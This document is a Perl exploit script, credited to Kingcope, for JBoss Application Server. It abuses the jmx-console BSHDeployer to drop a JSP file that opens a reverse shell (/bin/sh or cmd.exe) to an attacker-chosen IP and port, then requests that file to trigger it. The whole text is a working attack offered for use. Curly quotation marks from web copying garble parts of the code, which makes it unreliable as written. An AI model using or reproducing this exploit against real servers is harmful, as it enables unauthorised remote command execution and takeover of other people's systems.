exploit
Code:
#JBoss AS Remote Exploit
#by Kingcope
#####
use IO::Socket;
use LWP::UserAgent;
use URI::Escape;
use MIME::Base64;
sub usage {print “JBoss AS Remote Exploit
by Kingcope
usage: perl jboss.pl
“;print “example: perl daytona.pl192.168.2.10 8080 192.168.2.2 443 lnx
“;
exit;
}
if ($#ARGV != 4) { usage; }
$host = $ARGV[0];
$port = $ARGV[1];
$myip = $ARGV[2];
$myport = $ARGV[3];
$com = $ARGV[4];
if ($com eq “lnx”) {
$comspec = “/bin/sh”;
}
if ($com eq “win”) {
$comspec = “cmd.exe”;
}
$|=1;
$jsp=”
<%@page import="java.lang.*, java.util.*, java.io.*, java.net.*"
%>
<%!
static class StreamConnectorextends Thread
{
InputStream is;
OutputStream os;
StreamConnector( InputStream is, OutputStream os)
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader in = null;
BufferedWriter out = null;
try
{
in = new BufferedReader( new InputStreamReader( this.is ) );
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
char buffer[] = new char[8192];
int length;
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
{
out.write( buffer, 0, length );
out.flush();
}
} catch( Exception e ){}
try
{
if( in != null )
in.close();
if( out != null )
out.close();
} catch( Exception e ){}
}
}
%>
<%
try
{
Socket socket = new Socket( "$myip", $myport );
Process process = Runtime.getRuntime().exec( "$comspec" );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>“;
#print $jsp;exit;
srand(time());
sub randstr
{
my $length_of_randomstring=shift;# the length of# the random string to generate
my @chars=(’’a’’..’’z’’,’’A’’..’’Z’’,’’0’’..’’9’’,’’_’’);
my $random_string;
foreach (1..$length_of_randomstring)
{# rand @chars will generate arandom# number between 0 and scalar @chars
$random_string.=$chars[rand @chars];
}
return $random_string;
}
$appbase = randstr(8);
$jspname = randstr(8);
print “APPBASE=$appbase
JSPNAME=$jspname
“;
$bsh_script =
qq{import java.io.FileOutputStream;import sun.misc.BASE64Decoder;String val = “} . encode_base64($jsp, “”) . qq{“;BASE64Decoder decoder = newBASE64Decoder();
String jboss_home = System.getProperty(“jboss.server.home.dir”);
new File(jboss_home + “/deploy/} . $appbase . “.war” . qq{“).mkdir();
byte[] byteval = decoder.decodeBuffer(val);String jsp_file = jboss_home + “/deploy/} . $appbase . “.war/” . $jspname . “.jsp” . qq{“;FileOutputStream fstream = newFileOutputStream(jsp_file);
fstream.write(byteval);
fstream.close(); };
#
# UPLOAD
#
$params = ’’action=invokeOpByName&name=jboss.deployer:service=BSHDeployer&methodName=createScriptDeployment&argType=java.lang.String&arg0=’’ . uri_escape($bsh_script)
.
’’&argType=java.lang.String&arg1=’’ . randstr(8) . ’’.bsh’’;
my $ua = LWP::UserAgent->new;
$ua->agent(“Mozilla/5.0 (Windows; U;Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98Safari/534.13″);
my $req = HTTP::Request->new(POST => ” http://$host:$port/jmx-console/HtmlAdaptor “);
$req->content_type(’’application/x-www-form-urlencoded’’);
$req->content($params);
print “UPLOAD… “;
my $res = $ua->request($req);
if ($res->is_success) {
print “SUCCESS
“;
print “EXECUTE”;
sleep(5);
$uri = ’’/’’ . $appbase . ’’/’’ . $jspname . ’’.jsp’’;
for ($k=0;$k<10;$k++) {
my $ua = LWP::UserAgent->new;
$ua->agent(“Mozilla/5.0 (Windows; U;Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98Safari/534.13″);
my $req = HTTP::Request->new(GET => ” http://$host:$port$uri “);
my $res = $ua->request($req);
if ($res->is_success) {
print ”
SUCCESS
“;
exit;
} else {
print “.”;
# print $res->status_line.”
“;
sleep(5);
}
}
print “UNSUCCESSFUL
“;
}
else {
print “UNSUCCESSFUL
“;
print $res->status_line, ”
“;
exit;
}